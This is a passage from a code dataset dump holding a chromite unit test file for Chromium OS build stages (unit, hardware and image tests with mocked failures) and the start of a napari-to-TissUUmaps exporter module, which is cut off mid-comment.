generic_stages\nfrom chromite.cbuildbot.stages import test_stages\nfrom chromite.lib.const import waterfall\nfrom chromite.lib import constants\nfrom chromite.lib import cros_logging as logging\nfrom chromite.lib import cros_test_lib\nfrom chromite.lib import failures_lib\nfrom chromite.lib import fake_cidb\nfrom chromite.lib import osutils\nfrom chromite.lib import path_util\nfrom chromite.lib import timeout_util\n\n\n# pylint: disable=too-many-ancestors\n\nclass UnitTestStageTest(generic_stages_unittest.AbstractStageTestCase,\n cbuildbot_unittest.SimpleBuilderTestCase):\n \"\"\"Tests for the UnitTest stage.\"\"\"\n\n BOT_ID = 'amd64-generic-full'\n RELEASE_TAG = 'ToT.0.0'\n\n def setUp(self):\n self.rununittests_mock = self.PatchObject(commands, 'RunUnitTests')\n self.buildunittests_mock = self.PatchObject(\n commands, 'BuildUnitTestTarball', return_value='unit_tests.tar')\n self.uploadartifact_mock = self.PatchObject(\n generic_stages.ArchivingStageMixin, 'UploadArtifact')\n self.testauzip_mock = self.PatchObject(commands, 'TestAuZip')\n self.image_dir = os.path.join(\n self.build_root, 'src/build/images/amd64-generic/latest-cbuildbot')\n\n self._Prepare()\n\n def ConstructStage(self):\n self._run.GetArchive().SetupArchivePath()\n return test_stages.UnitTestStage(self._run, self._current_board)\n\n def testFullTests(self):\n \"\"\"Tests if full unit and cros_au_test_harness tests are run correctly.\"\"\"\n exists_mock = self.PatchObject(os.path, 'exists', return_value=True)\n makedirs_mock = self.PatchObject(osutils, 'SafeMakedirs')\n\n self.RunStage()\n makedirs_mock.assert_called_once_with(self._run.GetArchive().archive_path)\n exists_mock.assert_called_once_with(\n os.path.join(self.image_dir, 'au-generator.zip'))\n self.rununittests_mock.assert_called_once_with(\n self.build_root, self._current_board, blacklist=[], extra_env=mock.ANY)\n self.buildunittests_mock.assert_called_once_with(\n 
self.build_root, self._current_board,\n self._run.GetArchive().archive_path)\n self.uploadartifact_mock.assert_called_once_with(\n 'unit_tests.tar', archive=False)\n self.testauzip_mock.assert_called_once_with(self.build_root, self.image_dir)\n\n\nclass HWTestStageTest(generic_stages_unittest.AbstractStageTestCase,\n cbuildbot_unittest.SimpleBuilderTestCase):\n \"\"\"Tests for the HWTest stage.\"\"\"\n\n BOT_ID = 'x86-mario-release'\n VERSION = 'R36-5760.0.0'\n RELEASE_TAG = ''\n\n def setUp(self):\n self.run_suite_mock = self.PatchObject(commands, 'RunHWTestSuite')\n self.warning_mock = self.PatchObject(\n logging, 'PrintBuildbotStepWarnings')\n self.failure_mock = self.PatchObject(\n logging, 'PrintBuildbotStepFailure')\n\n self.suite_config = None\n self.suite = None\n self.version = None\n\n self._Prepare()\n\n def _Prepare(self, bot_id=None, version=None, warn_only=False, **kwargs):\n super(HWTestStageTest, self)._Prepare(bot_id, **kwargs)\n\n self.version = version or self.VERSION\n self._run.options.log_dir = '/b/cbuild/mylogdir'\n self.suite_config = self.GetHWTestSuite()\n self.suite_config.warn_only = warn_only\n self.suite = self.suite_config.suite\n\n def ConstructStage(self):\n self._run.GetArchive().SetupArchivePath()\n board_runattrs = self._run.GetBoardRunAttrs(self._current_board)\n board_runattrs.SetParallelDefault('test_artifacts_uploaded', True)\n return test_stages.HWTestStage(\n self._run, self._current_board, self._model, self.suite_config)\n\n def _RunHWTestSuite(self, debug=False, fails=False, warns=False,\n cmd_fail_mode=None):\n \"\"\"Verify the stage behavior in various circumstances.\n\n Args:\n debug: Whether the HWTest suite should be run in debug mode.\n fails: Whether the stage should fail.\n warns: Whether the stage should warn.\n cmd_fail_mode: How commands.RunHWTestSuite() should fail.\n If None, don't fail.\n \"\"\"\n # We choose to define these mocks in setUp() because they are\n # useful for tests that do not call this method. 
However, this\n # means we have to reset the mocks before each run.\n self.run_suite_mock.reset_mock()\n self.warning_mock.reset_mock()\n self.failure_mock.reset_mock()\n\n mock_report = self.PatchObject(\n test_stages.HWTestStage, 'ReportHWTestResults')\n\n to_raise = None\n\n if cmd_fail_mode == None:\n to_raise = None\n elif cmd_fail_mode == 'timeout':\n to_raise = timeout_util.TimeoutError('Timed out')\n elif cmd_fail_mode == 'suite_timeout':\n to_raise = failures_lib.SuiteTimedOut('Suite timed out')\n elif cmd_fail_mode == 'board_not_available':\n to_raise = failures_lib.BoardNotAvailable('Board not available')\n elif cmd_fail_mode == 'lab_fail':\n to_raise = failures_lib.TestLabFailure('Test lab failure')\n elif cmd_fail_mode == 'test_warn':\n to_raise = failures_lib.TestWarning('Suite passed with warnings')\n elif cmd_fail_mode == 'test_fail':\n to_raise = failures_lib.TestFailure('HWTest failed.')\n else:\n raise ValueError('cmd_fail_mode %s not supported' % cmd_fail_mode)\n\n if cmd_fail_mode == 'timeout':\n self.run_suite_mock.side_effect = to_raise\n else:\n self.run_suite_mock.return_value = commands.HWTestSuiteResult(\n to_raise, None)\n\n if fails:\n self.assertRaises(failures_lib.StepFailure, self.RunStage)\n else:\n self.RunStage()\n\n self.run_suite_mock.assert_called_once()\n self.assertEqual(self.run_suite_mock.call_args[1].get('debug'), debug)\n self.assertEqual(self.run_suite_mock.call_args[1].get('model'), self._model)\n\n # Make sure we print the buildbot failure/warning messages correctly.\n if fails:\n self.failure_mock.assert_called_once()\n else:\n self.failure_mock.assert_not_called()\n\n if warns:\n self.warning_mock.assert_called_once()\n else:\n self.warning_mock.assert_not_called()\n\n mock_report.assert_not_called()\n\n def testRemoteTrybotWithHWTest(self):\n \"\"\"Test remote trybot with hw test enabled\"\"\"\n cmd_args = ['--remote-trybot', '-r', self.build_root, '--hwtest',\n self.BOT_ID]\n self._Prepare(cmd_args=cmd_args)\n self._RunHWTestSuite()\n\n def testRemoteTrybotNoHWTest(self):\n \"\"\"Test remote trybot with no hw test\"\"\"\n cmd_args = ['--remote-trybot', '-r', self.build_root, self.BOT_ID]\n self._Prepare(cmd_args=cmd_args)\n self._RunHWTestSuite(debug=True)\n\n def testWithSuite(self):\n \"\"\"Test if run correctly with a test suite.\"\"\"\n self._RunHWTestSuite()\n\n def testHandleTestWarning(self):\n \"\"\"Tests that we pass the build on test warning.\"\"\"\n # CQ passes.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(warns=True, cmd_fail_mode='test_warn')\n\n # PFQ passes.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(warns=True, cmd_fail_mode='test_warn')\n\n # Canary passes.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(warns=True, cmd_fail_mode='test_warn')\n\n def testHandleLabFail(self):\n \"\"\"Tests that we handle lab failures correctly.\"\"\"\n # CQ fails.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='lab_fail')\n\n # PFQ fails.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='lab_fail')\n\n # Canary fails.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='lab_fail')\n\n def testWithSuiteWithFatalFailure(self):\n \"\"\"Tests that we fail on test failure.\"\"\"\n self._RunHWTestSuite(fails=True, cmd_fail_mode='test_fail')\n\n def testWithSuiteWithFatalFailureWarnFlag(self):\n \"\"\"Tests that we don't fail if HWTestConfig warn_only is True.\"\"\"\n self._Prepare('x86-alex-release', 
warn_only=True)\n self._RunHWTestSuite(warns=True, cmd_fail_mode='test_fail')\n\n def testHandleSuiteTimeout(self):\n \"\"\"Tests that we handle suite timeout correctly .\"\"\"\n # Canary fails.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='suite_timeout')\n\n # CQ fails.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='suite_timeout')\n\n # PFQ fails.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='suite_timeout')\n\n def testHandleBoardNotAvailable(self):\n \"\"\"Tests that we handle board not available correctly.\"\"\"\n # Canary passes.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(warns=True, cmd_fail_mode='board_not_available')\n\n # CQ fails.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='board_not_available')\n\n # PFQ fails.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='board_not_available')\n\n def testHandleTimeout(self):\n \"\"\"Tests that we handle timeout exceptions correctly.\"\"\"\n # Canary fails.\n self._Prepare('x86-alex-release')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='timeout')\n\n # CQ fails.\n self._Prepare('x86-alex-paladin')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='timeout')\n\n # PFQ fails.\n self._Prepare('falco-chrome-pfq')\n self._RunHWTestSuite(fails=True, cmd_fail_mode='timeout')\n\n def testPayloadsNotGenerated(self):\n \"\"\"Test that we exit early if payloads are not generated.\"\"\"\n board_runattrs = self._run.GetBoardRunAttrs(self._current_board)\n board_runattrs.SetParallel('test_artifacts_uploaded', False)\n\n self.RunStage()\n\n # Make sure we make the stage orange.\n self.warning_mock.assert_called_once()\n # We exit early, so commands.RunHWTestSuite should not have been\n # called.\n self.assertFalse(self.run_suite_mock.called)\n\n def testReportHWTestResults(self):\n \"\"\"Test ReportHWTestResults.\"\"\"\n stage = self.ConstructStage()\n json_str = \"\"\"\n{\n \"tests\":{\n \"Suite job\":{\n \"status\":\"FAIL\"\n },\n \"cheets_CTS.com.android.cts.dram\":{\n \"status\":\"FAIL\"\n },\n \"cheets_ContainerSmokeTest\":{\n \"status\":\"GOOD\"\n },\n \"cheets_DownloadsFilesystem\":{\n \"status\":\"ABORT\"\n },\n \"cheets_KeyboardTest\":{\n \"status\":\"UNKNOWN\"\n }\n }\n}\n\"\"\"\n json_dump_dict = json.loads(json_str)\n db = fake_cidb.FakeCIDBConnection()\n build_id = db.InsertBuild('build_1', waterfall.WATERFALL_INTERNAL, 1,\n 'build_1', 'bot_hostname')\n\n # When json_dump_dict is None\n self.assertIsNone(stage.ReportHWTestResults(None, build_id, db))\n\n # When db is None\n self.assertIsNone(stage.ReportHWTestResults(json_dump_dict, build_id, None))\n\n # When results are successfully reported\n stage.ReportHWTestResults(json_dump_dict, build_id, db)\n results = db.GetHWTestResultsForBuilds([build_id])\n result_dict = {x.test_name: x.status for x in results}\n\n expect_dict = {\n 'cheets_DownloadsFilesystem': constants.HWTEST_STATUS_ABORT,\n 'cheets_KeyboardTest': constants.HWTEST_STATUS_OTHER,\n 'Suite job': constants.HWTEST_STATUS_FAIL,\n 'cheets_CTS.com.android.cts.dram': constants.HWTEST_STATUS_FAIL,\n 'cheets_ContainerSmokeTest': constants.HWTEST_STATUS_PASS\n }\n self.assertItemsEqual(expect_dict, result_dict)\n self.assertEqual(len(results), 5)\n\n def testPerformStageOnCQ(self):\n \"\"\"Test PerformStage on CQ.\"\"\"\n self._Prepare('eve-paladin')\n stage = self.ConstructStage()\n mock_report = self.PatchObject(\n 
test_stages.HWTestStage, 'ReportHWTestResults')\n cmd_result = mock.Mock(to_raise=None)\n self.PatchObject(commands, 'RunHWTestSuite', return_value=cmd_result)\n stage.PerformStage()\n\n mock_report.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY)\n\n\nclass ImageTestStageTest(generic_stages_unittest.AbstractStageTestCase,\n cros_test_lib.RunCommandTestCase,\n cbuildbot_unittest.SimpleBuilderTestCase):\n \"\"\"Test image test stage.\"\"\"\n\n BOT_ID = 'x86-mario-release'\n RELEASE_TAG = 'ToT.0.0'\n\n def setUp(self):\n self._test_root = os.path.join(self.build_root, 'tmp/results_dir')\n self.PatchObject(commands, 'CreateTestRoot', autospec=True,\n return_value='/tmp/results_dir')\n self.PatchObject(path_util, 'ToChrootPath',\n side_effect=lambda x: x)\n self._Prepare()\n\n def _Prepare(self, bot_id=None, **kwargs):\n super(ImageTestStageTest, self)._Prepare(bot_id, **kwargs)\n self._run.GetArchive().SetupArchivePath()\n\n def ConstructStage(self):\n return test_stages.ImageTestStage(self._run, self._current_board)\n\n def testPerformStage(self):\n \"\"\"Tests that we correctly run test-image script.\"\"\"\n stage = self.ConstructStage()\n stage.PerformStage()\n cmd = [\n 'sudo', '--',\n os.path.join(self.build_root, 'chromite', 'bin', 'test_image'),\n '--board', self._current_board,\n '--test_results_root',\n path_util.ToChrootPath(os.path.join(self._test_root,\n 'image_test_results')),\n path_util.ToChrootPath(stage.GetImageDirSymlink()),\n ]\n self.assertCommandContains(cmd)\n", "repo_name": "kiwibrowser/src", "sub_path": "third_party/chromite/cbuildbot/stages/test_stages_unittest.py", "file_name": "test_stages_unittest.py", "file_ext": "py", "file_size_in_byte": 13440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "chromite.cbuildbot.stages.generic_stages_unittest.AbstractStageTestCase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages_unittest", "line_number": 25, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest.SimpleBuilderTestCase", "line_number": 26, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest", "line_number": 26, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 33, "usage_type": "argument"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 35, "usage_type": "argument"}, {"api_name": "chromite.cbuildbot.stages.generic_stages.ArchivingStageMixin", "line_number": 37, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages", "line_number": 37, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 38, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.test_stages.UnitTestStage", "line_number": 46, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "chromite.lib.osutils", "line_number": 51, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "mock.ANY", "line_number": 58, "usage_type": "attribute"}, {"api_name": 
"chromite.cbuildbot.stages.generic_stages_unittest.AbstractStageTestCase", "line_number": 67, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages_unittest", "line_number": 67, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest.SimpleBuilderTestCase", "line_number": 68, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest", "line_number": 68, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 76, "usage_type": "argument"}, {"api_name": "chromite.lib.cros_logging", "line_number": 78, "usage_type": "argument"}, {"api_name": "chromite.lib.cros_logging", "line_number": 80, "usage_type": "argument"}, {"api_name": "chromite.cbuildbot.stages.test_stages.HWTestStage", "line_number": 101, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 101, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.stages.test_stages.HWTestStage", "line_number": 123, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 123, "usage_type": "name"}, {"api_name": "chromite.lib.timeout_util.TimeoutError", "line_number": 130, "usage_type": "call"}, {"api_name": "chromite.lib.timeout_util", "line_number": 130, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.SuiteTimedOut", "line_number": 132, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 132, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.BoardNotAvailable", "line_number": 134, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 134, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.TestLabFailure", "line_number": 136, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 136, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.TestWarning", "line_number": 138, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 138, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.TestFailure", "line_number": 140, "usage_type": "call"}, {"api_name": "chromite.lib.failures_lib", "line_number": 140, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.commands.HWTestSuiteResult", "line_number": 147, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 147, "usage_type": "name"}, {"api_name": "chromite.lib.failures_lib.StepFailure", "line_number": 151, "usage_type": "attribute"}, {"api_name": "chromite.lib.failures_lib", "line_number": 151, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 305, "usage_type": "call"}, {"api_name": "chromite.lib.fake_cidb.FakeCIDBConnection", "line_number": 306, "usage_type": "call"}, {"api_name": "chromite.lib.fake_cidb", "line_number": 306, "usage_type": "name"}, {"api_name": "chromite.lib.const.waterfall.WATERFALL_INTERNAL", "line_number": 307, "usage_type": "attribute"}, {"api_name": "chromite.lib.const.waterfall", "line_number": 307, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_ABORT", "line_number": 322, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 322, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_OTHER", "line_number": 323, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 323, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_FAIL", "line_number": 324, "usage_type": "attribute"}, 
{"api_name": "chromite.lib.constants", "line_number": 324, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_FAIL", "line_number": 325, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 325, "usage_type": "name"}, {"api_name": "chromite.lib.constants.HWTEST_STATUS_PASS", "line_number": 326, "usage_type": "attribute"}, {"api_name": "chromite.lib.constants", "line_number": 326, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.stages.test_stages.HWTestStage", "line_number": 336, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 336, "usage_type": "name"}, {"api_name": "mock.Mock", "line_number": 337, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 338, "usage_type": "argument"}, {"api_name": "mock.ANY", "line_number": 341, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages_unittest.AbstractStageTestCase", "line_number": 344, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.stages.generic_stages_unittest", "line_number": 344, "usage_type": "name"}, {"api_name": "chromite.lib.cros_test_lib.RunCommandTestCase", "line_number": 345, "usage_type": "attribute"}, {"api_name": "chromite.lib.cros_test_lib", "line_number": 345, "usage_type": "name"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest.SimpleBuilderTestCase", "line_number": 346, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.cbuildbot_unittest", "line_number": 346, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 353, "usage_type": "call"}, {"api_name": "os.path", "line_number": 353, "usage_type": "attribute"}, {"api_name": "chromite.cbuildbot.commands", "line_number": 354, "usage_type": "argument"}, {"api_name": "chromite.lib.path_util", "line_number": 356, "usage_type": "argument"}, {"api_name": "chromite.cbuildbot.stages.test_stages.ImageTestStage", "line_number": 365, "usage_type": "call"}, {"api_name": "chromite.cbuildbot.stages.test_stages", "line_number": 365, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 373, "usage_type": "call"}, {"api_name": "os.path", "line_number": 373, "usage_type": "attribute"}, {"api_name": "chromite.lib.path_util.ToChrootPath", "line_number": 376, "usage_type": "call"}, {"api_name": "chromite.lib.path_util", "line_number": 376, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 376, "usage_type": "call"}, {"api_name": "os.path", "line_number": 376, "usage_type": "attribute"}, {"api_name": "chromite.lib.path_util.ToChrootPath", "line_number": 378, "usage_type": "call"}, {"api_name": "chromite.lib.path_util", "line_number": 378, "usage_type": "name"}]} +{"seq_id": "32825167363", "text": "\"\"\"This module implements an exporter from the Napari layers to TissUUmaps.\nThe functions are implemented such that the module can be reused in other\ncontext by generating pythonic versions of the data first, then saving them.\n\"\"\"\nimport json\nfrom logging import getLogger\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Union\n\nimport numpy as np\nfrom napari.layers.labels.labels import Labels\nfrom napari.types import FullLayerData\nfrom napari.utils.io import imsave\n\nlogger = getLogger(__name__)\n\n\ndef filter_type(\n layer_data: List[FullLayerData], type_filter: Union[str, List[str]]\n) -> List[FullLayerData]:\n \"\"\"Filters a list of layers provided by Napari by layer type.\n Only the layers that corresponds to `type_filter` are 
returned.\n\n    Parameters\n    ----------\n    layer_data : List[FullLayerData]\n        The list of layers provided by Napari. Must contain tuples, with the\n        third one corresponding to the layer type as a string.\n    type_filter : Union[str, List[str]]\n        The filter to use, as a string. It is possible to use multiple filters by\n        providing a list of strings.\n    Returns\n    -------\n    List[FullLayerData]\n        The list of layers in the same format as the one in `layer_data` where\n        the layer types *not* corresponding to `type_filter` are discarded.\n    \"\"\"\n    # Making sure `type_filter` is a list\n    if not isinstance(type_filter, list):\n        type_filter = [type_filter]\n\n    return [\n        (data, meta, layer_type)\n        for (data, meta, layer_type) in layer_data\n        if layer_type in type_filter\n    ]\n\n\ndef generate_tmap_config(\n    filename: str,\n    layer_data: List[FullLayerData],\n    internal_shapes: bool = False,\n) -> Dict[str, Any]:\n    \"\"\"Generates the Tissuumaps config of the Napari layers to be saved.\n\n    Parameters\n    ----------\n    filename : str\n        The filename to use in Tissuumaps.\n    layer_data : List[FullLayerData]\n        The layers to be saved as provided by the Napari plugin manager. It\n        contains a list of layers, which are themselves dictionaries containing\n        the data, the metadata and the type of layer.\n    internal_shapes : bool\n        Determines if the shapes layers are saved in the tmap file (True) or if\n        the tmap file references an external json file (False).\n    Returns\n    -------\n    Dict[str, Any]\n        The Tissuumaps configuration as a dictionary. The aim is to later save\n        a json file with a .tmap extension.\n    \"\"\"\n    # This function first creates nested lists and dictionaries to add to the\n    # final dictionary in the latter part of the function.\n\n    # Generating the list of markers (points).\n    markers = []\n    for data, meta, _ in filter_type(layer_data, \"points\"):\n        markers.append(\n            {\n                \"autoLoad\": True,\n                \"comment\": meta[\"name\"],\n                \"expectedCSV\": {\n                    \"X_col\": \"x\",\n                    \"Y_col\": \"y\",\n                    \"color\": \"color\",\n                    \"group\": \"name\",\n                    \"name\": \"\",\n                    \"key\": \"letters\",\n                },\n                \"path\": f\"points/{meta['name']}.csv\",\n                \"title\": f\"Download markers ({meta['name']})\",\n            }\n        )\n\n    # Generating the list of layers (images and labels)\n    layers, layer_filters, layer_opacities, layer_visibilities = [], {}, {}, {}\n    default_filters = [\n        {\"name\": \"Brightness\", \"value\": \"0\"},\n        {\"name\": \"Contrast\", \"value\": \"1\"},\n        {\"name\": \"Color\", \"value\": \"0\"},\n    ]\n    regions = {}\n    # Image index, keeps track of images and labels to get a consistent\n    # indexing in the tmap project file.\n    idx = 0\n\n    for data, meta, layer_type in layer_data:\n        if layer_type == \"image\":\n            layers.append(\n                {\n                    \"name\": meta[\"name\"],\n                    \"tileSource\": f\"images/{meta['name']}.tif.dzi\",\n                }\n            )\n            layer_filters[str(idx)] = default_filters.copy()\n            layer_opacities[str(idx)] = \"{:.3f}\".format(meta[\"opacity\"])\n            layer_visibilities[str(idx)] = bool(meta[\"visible\"])\n            idx += 1\n        elif layer_type == \"labels\":\n            layers.append(\n                {\n                    \"name\": meta[\"name\"],\n                    \"tileSource\": f\"labels/{meta['name']}.tif.dzi\",\n                }\n            )\n            layer_filters[str(idx)] = default_filters.copy()\n            layer_opacities[str(idx)] = \"{:.3f}\".format(meta[\"opacity\"])\n            layer_visibilities[str(idx)] = bool(meta[\"visible\"])\n            idx += 1\n        elif layer_type == \"shapes\":\n            regions.update(generate_shapes_dict(data, meta))\n\n    # The final configuration to be returned, combining all the lists and\n    # dictionaries generated above.\n    config = {\n        \"compositeMode\": 
\"lighter\",\n        \"filename\": filename,\n        \"layers\": layers,\n        \"filters\": [\"Brightness\", \"Contrast\", \"Color\"],\n        \"layerFilters\": layer_filters,\n        \"layerOpacities\": layer_opacities,\n        \"layerVisibilities\": layer_visibilities,\n        \"markerFiles\": markers,\n        \"settings\": [\n            {\"function\": \"_autoLoadCSV\", \"module\": \"dataUtils\", \"value\": True},\n            {\n                \"function\": \"_globalMarkerScale\",\n                \"module\": \"glUtils\",\n                \"value\": 7.5,\n            },\n        ],\n    }\n    if not regions:\n        config[\"regions\"] = {}\n    elif internal_shapes:\n        config[\"regions\"] = regions\n    else:\n        config[\"regionFile\"] = \"regions/regions.json\"\n\n    return config\n\n\ndef generate_shapes_dict(\n    data: FullLayerData, meta: Dict[str, Any]\n) -> Dict[str, Any]:\n    \"\"\"Generates a dictionary containing the info to plot shapes in Tissuumaps.\n    The dict can later on be exported as a GeoJSON file or added to the .tmap\n    project file.\n\n    Parameters\n    ----------\n    data : FullLayerData\n        The Shapes layer data (a list of shapes, which are lists of points) as\n        provided by Napari.\n    meta : Dict[str, Any]\n        The metadata of the shapes layer containing the name and colors of the\n        shapes.\n\n    Returns\n    -------\n    Dict[str, Any]\n        A dictionary containing the information to draw the shapes in\n        Tissuumaps.\n    \"\"\"\n    shape_dict = {\"type\": \"FeatureCollection\", \"features\": []}\n    for i, shape in enumerate(data):\n        shape_type = meta[\"shape_type\"][i]\n        shape_name = meta[\"name\"] + f\"_{shape_type}_{i+1}\"\n        shape_color = (255 * meta[\"face_color\"][i, :3]).astype(int).tolist()\n        # We enumerate each shape that appears in the layer\n        subshape_dict = {\n            \"type\": \"Feature\",\n            \"geometry\": {\"type\": \"MultiPolygon\"},\n            \"properties\": {\n                \"name\": shape_name,\n                \"classification\": {\"name\": \"\"},\n                \"color\": shape_color,\n                \"isLocked\": False,\n            },\n        }\n        # Different shapes have different points to draw\n        points_to_draw = []\n        if shape_type == \"ellipse\":\n            assert isinstance(shape, np.ndarray)\n            ellipse_center = (\n                (shape[0][0] + shape[2][0]) / 2.0,\n                (shape[0][1] + shape[1][1]) / 2.0,\n            )\n            # `a` represents the vector from the center of the ellipse to the\n            # right hand side, while `b` is the up vector.\n            ellipse_a = shape[1][0] - ellipse_center[0]\n            ellipse_b = shape[1][1] - ellipse_center[1]\n\n            # Minimum arc distance is the length of a single arc as a\n            # function of the ellipse's radii. The purpose is such that the\n            # resolution (number of points) grows with the ellipse. 
The formula\n            # is approximated and computes the arc based on a circle with the\n            # radius being equal to the longest axis of the ellipse.\n            minimum_arc_distance = 3.0\n            max_axis = np.maximum(np.abs(ellipse_a), np.abs(ellipse_b))\n            N = np.maximum(\n                int(np.ceil(2.0 * np.pi * max_axis / minimum_arc_distance)), 10\n            )\n            thetas = np.linspace(0, 2 * np.pi, N + 1)\n            points_to_draw = np.stack(\n                [\n                    ellipse_a * np.cos(thetas) + ellipse_center[0],\n                    ellipse_b * np.sin(thetas) + ellipse_center[1],\n                ],\n                axis = -1,\n            )\n        elif shape_type == \"line\" or shape_type == \"path\":\n            assert isinstance(shape, np.ndarray)\n            points_to_draw = np.vstack([shape, shape[-2::-1]])\n        else:  # shape_type == \"polygon\" or shape_type == \"rectangle\"\n            assert isinstance(shape, np.ndarray)\n            points_to_draw = shape\n\n        # The columns are swapped due to conventional differences between\n        # Napari (y, x) and TissUUmaps (x, y)\n        coordinates = points_to_draw[:, [1, 0]].tolist()\n        subshape_dict[\"geometry\"][\"coordinates\"] = [[coordinates]]\n        # Adding the properties, if there are any\n        properties = meta.get(\"properties\", {}).copy()\n        for prop in properties:\n            if isinstance(properties[prop], np.ndarray):\n                properties[prop] = properties[prop].tolist()[i]\n        subshape_dict[\"properties\"][\"extra\"] = properties\n        # We add it to the full dict\n        shape_dict[\"features\"].append(subshape_dict)\n    return shape_dict\n\n\ndef rgb2hex(color_vec: np.ndarray) -> str:\n    \"\"\"Transforms an array of floats into a hex color string (#xxxxxx).\n\n    Parameters\n    ----------\n    color_vec : np.ndarray\n        A numpy array of three rgb components.\n    Returns\n    -------\n    str\n        The color as a string in hex format.\n    \"\"\"\n    return \"#\" + \"\".join([f\"{int(c*255):02X}\" for c in color_vec[:3]])\n\n\ndef tmap_writer(\n    save_path: Union[Path, str], layer_data: List[FullLayerData]\n) -> List[str]:\n    \"\"\"Creates a Tissuumaps project folder based on a Napari list of layers.\n\n    Parameters\n    ----------\n    save_path : Union[Path, str]\n        The path to save the Tissuumaps project to. Must contain the name of\n        the Tissuumaps project file, including the .tmap extension.\n    layer_data : List[FullLayerData]\n        The list of layers to save as provided by Napari.\n    Returns\n    -------\n    List[str]\n        A list of strings containing each of the filenames that were written.\n    \"\"\"\n    savedfilenames = []\n    # The main tissuumaps project folder is created.\n    save_path = Path(save_path)\n    save_path.mkdir(parents=True, exist_ok=True)\n\n    # Creation of the tmap file\n    tmap_cfg = generate_tmap_config(save_path.stem, layer_data)\n    tmap_file = open(save_path / \"main.tmap\", \"w+\")\n    savedfilenames.append(tmap_file.name)\n    tmap_file.write(json.dumps(tmap_cfg, indent=4))\n    tmap_file.close()\n\n    # Shapes have to be combined in the same file\n    regions = {}\n    # Saving the files\n    for data, meta, layer_type in layer_data:\n        if layer_type == \"image\":\n            # The Napari images can directly be saved to tif.\n            image_folder = save_path / \"images\"\n            image_folder.mkdir(exist_ok=True)\n            path_image = image_folder / f\"{meta['name']}.tif\"\n            imsave(str(path_image), data)\n            savedfilenames.append(path_image)\n        elif layer_type == \"points\":\n            # The Napari points are in a different coordinate system (y,x)\n            # that must be converted to 